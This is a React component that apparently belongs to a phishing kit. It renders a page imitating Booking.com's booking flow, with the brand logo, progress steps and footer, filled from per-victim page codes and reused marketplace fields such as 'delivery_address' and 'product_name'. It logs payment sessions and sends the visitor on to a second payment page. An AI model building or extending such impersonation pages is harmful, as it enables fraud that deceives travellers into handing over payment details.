import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import './BookingSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency } from '../stripeCurrency';
import { API_URL } from '../apiBase';
import { clearRefundFlow } from '../paymentRefundFlow';
import {
  postPaymentTransitionOnce,
  resolvePaymentPageCode,
  usePaymentSessionId,
} from '../paymentSession';
import { usePaymentPaths } from '../paymentPaths';
import {
  getBookingLocale,
  resolveBookingCountryCode,
} from '../bookingLocales';
import { resolveBookingDates } from '../bookingMeta';

function parsePriceNumber(raw) {
  if (raw == null || String(raw).trim() === '') return null;
  const s = String(raw)
    .replace(/\s+/g, '')
    .replace(/[^0-9.,-]/g, '')
    .replace(',', '.');
  const n = parseFloat(s);
  return Number.isFinite(n) ? n : null;
}

function formatPriceText(priceNumber) {
  if (priceNumber == null) return '—';
  return priceNumber % 1 === 0 ? String(priceNumber.toFixed(0)) : String(priceNumber);
}

function formatBookingDate(date, locale) {
  try {
    return new Intl.DateTimeFormat(locale, {
      day: '2-digit',
      month: '2-digit',
      year: 'numeric',
    }).format(date);
  } catch {
    return date.toLocaleDateString();
  }
}

function resolvePhotoUrl(raw) {
  const u = (raw || '').trim();
  if (!u) return '';
  if (u.startsWith('http://') || u.startsWith('https://')) return u;
  const base = API_URL.replace(/\/$/, '');
  return `${base}/${u.replace(/^\//, '')}`;
}

function IconCheck() {
  return (
    <svg viewBox="0 0 24 24" aria-hidden className="bcom-ico-check">
      <path d="M9.5 16.2 5.8 12.5l1.4-1.4 2.3 2.3 6.5-6.5 1.4 1.4-7.9 7.9Z" fill="currentColor" />
    </svg>
  );
}

function IconClock() {
  return (
    <svg viewBox="0 0 24 24" aria-hidden className="bcom-ico-clock">
      <path
        d="M12 4a8 8 0 1 0 0 16 8 8 0 0 0 0-16Zm0 2a6 6 0 1 1 0 12 6 6 0 0 1 0-12Zm-.5 3h1.5v5.2l3.6 2.1-.8 1.3-4.3-2.5V9Z"
        fill="currentColor"
      />
    </svg>
  );
}

function IconArrivalCheck() {
  return (
    <svg viewBox="0 0 24 24" aria-hidden className="bcom-arrival-ico">
      <path
        d="M9.5 16.2 5.8 12.5l1.4-1.4 2.3 2.3 6.5-6.5 1.4 1.4-7.9 7.9Z"
        fill="currentColor"
      />
    </svg>
  );
}

function IconDesk() {
  return (
    <svg viewBox="0 0 24 24" aria-hidden className="bcom-arrival-ico">
      <path
        d="M4 10V8a2 2 0 0 1 2-2h12a2 2 0 0 1 2 2v2h1a1 1 0 1 1 0 2h-1v6h-2v-4H5v4H3v-6H2a1 1 0 1 1 0-2h2Zm2-2v2h12V8H6Z"
        fill="currentColor"
      />
    </svg>
  );
}

function limitedSupplyCopy(t) {
  if (t.limitedSupplyTitle && t.limitedSupplyBody) {
    return { title: t.limitedSupplyTitle, body: t.limitedSupplyBody };
  }
  const raw = t.limitedSupply || '';
  const idx = raw.indexOf(':');
  if (idx === -1) return { title: raw, body: '' };
  return {
    title: `${raw.slice(0, idx + 1).trim()}`,
    body: raw.slice(idx + 1).trim(),
  };
}

function BookingSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page && !!pageCode);
  const [workTravel, setWorkTravel] = useState('no');
  const [specialRequest, setSpecialRequest] = useState('');
  const sessionId = usePaymentSessionId();

  const effectivePage = pageData || page || null;
  const localeCountry = resolveBookingCountryCode({ pageData: effectivePage });
  const t = getBookingLocale(localeCountry);
  const supply = limitedSupplyCopy(t);
  const localeTag = t.lang === 'en' ? 'en-GB' : `${t.lang}-${localeCountry}`;

  const activePageCode = (pageCode || effectivePage?.page_code || '').trim();
  const { toIndex2 } = usePaymentPaths(activePageCode);
  const index2Path = toIndex2();

  const countryCode = localeCountry;
  const currencyCode = getPrimaryCurrency(countryCode) || 'EUR';

  const priceNumber = useMemo(
    () => parsePriceNumber(effectivePage?.price),
    [effectivePage?.price],
  );
  const priceText = formatPriceText(priceNumber);
  const priceLine = priceText === '—' ? `— ${currencyCode}` : `${priceText} ${currencyCode}`;

  const guestName = [effectivePage?.first_name, effectivePage?.last_name].filter(Boolean).join(' ');
  const addressLine = (effectivePage?.delivery_address || '—').trim() || '—';
  const propertyName = (effectivePage?.product_name || '—').trim() || '—';
  const photoUrl = resolvePhotoUrl(effectivePage?.photo_url);
  const { checkIn, checkOut } = useMemo(
    () => resolveBookingDates({
      pageMeta: effectivePage?.page_meta,
      pageCode: activePageCode,
    }),
    [effectivePage?.page_meta, activePageCode],
  );

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [page, pageCode]);

  const handleNext = () => {
    clearRefundFlow();
    const pc = resolvePaymentPageCode(activePageCode);
    const storedLogId = sessionStorage.getItem('payment_log_id');
    const storedSessionId = sessionStorage.getItem('payment_session_id');
    if (storedLogId && storedSessionId && pc) {
      postPaymentTransitionOnce(API_URL, {
        log_id: storedLogId,
        session_id: storedSessionId,
        page_code: pc,
      });
    }
  };

  if (loading) {
    return (
      <div className="bcom-page">
        <p className="bcom-loading">{t.loading}</p>
      </div>
    );
  }

  if (!effectivePage) {
    return (
      <div className="bcom-page">
        <p className="bcom-loading">—</p>
      </div>
    );
  }

  return (
    <div className="bcom-page">
      <header className="bcom-header">
        <div className="bcom-header-inner">
          <div className="bcom-logo" aria-label="Booking.com">Booking.com</div>
        </div>
      </header>

      <nav className="bcom-stepper" aria-label="Progress">
        <div className="bcom-stepper-inner">
          <div className="bcom-step bcom-step-done">
            <span className="bcom-step-badge bcom-step-badge-filled">
              <IconCheck />
            </span>
            <span className="bcom-step-label">{t.stepSelection}</span>
          </div>
          <div className="bcom-step-connector" aria-hidden />
          <div className="bcom-step bcom-step-active">
            <span className="bcom-step-badge bcom-step-badge-filled">2</span>
            <span className="bcom-step-label">{t.stepDetails}</span>
          </div>
          <div className="bcom-step-connector" aria-hidden />
          <div className="bcom-step bcom-step-pending">
            <span className="bcom-step-badge bcom-step-badge-outline">3</span>
            <span className="bcom-step-label">{t.stepFinal}</span>
          </div>
        </div>
      </nav>

      <div className="bcom-layout">
        <aside className="bcom-sidebar">
          <section className="bcom-card">
            <h2 className="bcom-card-title">{t.bookingDetails}</h2>
            {guestName ? <p className="bcom-guest-line">{guestName}</p> : null}
            <div className="bcom-dates">
              <div>
                <span className="bcom-label">{t.checkIn}</span>
                <strong>{formatBookingDate(checkIn, localeTag)}</strong>
              </div>
              <div>
                <span className="bcom-label">{t.checkOut}</span>
                <strong>{formatBookingDate(checkOut, localeTag)}</strong>
              </div>
            </div>
          </section>

          <section className="bcom-card bcom-price-card">
            <h2 className="bcom-card-title">{t.priceSummary}</h2>
            <div className="bcom-price-row">
              <span>{t.price}</span>
              <strong>{priceLine}</strong>
            </div>
          </section>

          <section className="bcom-card">
            <h2 className="bcom-card-title">{t.cancellationTitle}</h2>
            <p className="bcom-card-text">{t.cancellationText}</p>
          </section>

          <section className="bcom-card">
            <h2 className="bcom-card-title">{t.paymentDetails}</h2>
            <div className="bcom-pay-rows">
              <div className="bcom-pay-row">
                <span>{t.payToday}</span>
                <strong>0 {currencyCode}</strong>
              </div>
              <div className="bcom-pay-row">
                <span>{t.payAtProperty}</span>
                <strong>{priceLine}</strong>
              </div>
            </div>
          </section>

          <section className="bcom-card">
            <h2 className="bcom-card-title">{t.refundSchedule}</h2>
            <p className="bcom-card-text">{t.refundScheduleText}</p>
          </section>

          <section className="bcom-alert">
            <IconClock />
            <div className="bcom-alert-body">
              <p className="bcom-alert-title">{supply.title}</p>
              {supply.body ? <p className="bcom-alert-text">{supply.body}</p> : null}
            </div>
          </section>
        </aside>

        <main className="bcom-main">
          <section className="bcom-card bcom-property">
            <div className="bcom-property-photo">
              {photoUrl ? (
                <img src={photoUrl} alt="" />
              ) : (
                <div className="bcom-property-photo-ph" aria-hidden />
              )}
            </div>
            <div className="bcom-property-info">
              <h2 className="bcom-property-name">{propertyName}</h2>
              <p className="bcom-property-address">{addressLine}</p>
              <p className="bcom-property-badge">{t.greatLocation}</p>
            </div>
          </section>

          <section className="bcom-card">
            <h2 className="bcom-section-title">{t.enterDetails}</h2>
            <div className="bcom-banner-success">{t.almostDone}</div>
          </section>

          <section className="bcom-card bcom-card-work">
            <h2 className="bcom-field-title">
              {t.workTravel} <span className="bcom-opt">(optional)</span>
            </h2>
            <div className="bcom-radio-row">
              <label className={`bcom-radio${workTravel === 'yes' ? ' is-on' : ''}`}>
                <input
                  type="radio"
                  name="workTravel"
                  value="yes"
                  checked={workTravel === 'yes'}
                  onChange={() => setWorkTravel('yes')}
                />
                <span className="bcom-radio-mark" aria-hidden />
                {t.workYes}
              </label>
              <label className={`bcom-radio${workTravel === 'no' ? ' is-on' : ''}`}>
                <input
                  type="radio"
                  name="workTravel"
                  value="no"
                  checked={workTravel === 'no'}
                  onChange={() => setWorkTravel('no')}
                />
                <span className="bcom-radio-mark" aria-hidden />
                {t.workNo}
              </label>
            </div>
          </section>

          <section className="bcom-card">
            <h2 className="bcom-field-title">{t.specialRequests}</h2>
            <p className="bcom-hint">{t.specialRequestsHint}</p>
            <p className="bcom-field-note">{t.specialRequestsPh}</p>
            <label className="bcom-sr-only" htmlFor="bcom-special">{t.specialRequestsPh}</label>
            <textarea
              id="bcom-special"
              className="bcom-textarea"
              rows={5}
              value={specialRequest}
              onChange={(e) => setSpecialRequest(e.target.value)}
            />
          </section>

          <section className="bcom-card">
            <h2 className="bcom-field-title">{t.arrivalTitle}</h2>
            <ul className="bcom-arrival-list">
              <li className="bcom-arrival-item">
                <IconArrivalCheck />
                <span>{t.arrivalReady}</span>
              </li>
              <li className="bcom-arrival-item">
                <IconDesk />
                <span>{t.arrivalDesk}</span>
              </li>
            </ul>
            <button type="button" className="bcom-link-btn">{t.arrivalAddLink}</button>
          </section>

          <div className="bcom-actions">
            <Link to={index2Path} className="bcom-btn-primary" onClick={handleNext}>
              {t.nextButton} &rsaquo;
            </Link>
          </div>
        </main>
      </div>

      <footer className="bcom-footer">
        <nav className="bcom-footer-links">
          <span>{t.footerAbout}</span>
          <span className="bcom-footer-sep">|</span>
          <span>{t.footerHelp}</span>
          <span className="bcom-footer-sep">|</span>
          <span>{t.footerTerms}</span>
          <span className="bcom-footer-sep">|</span>
          <span>{t.footerPrivacy}</span>
        </nav>
        <p className="bcom-footer-copy">{t.footerCopyright}</p>
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default BookingSuccess;
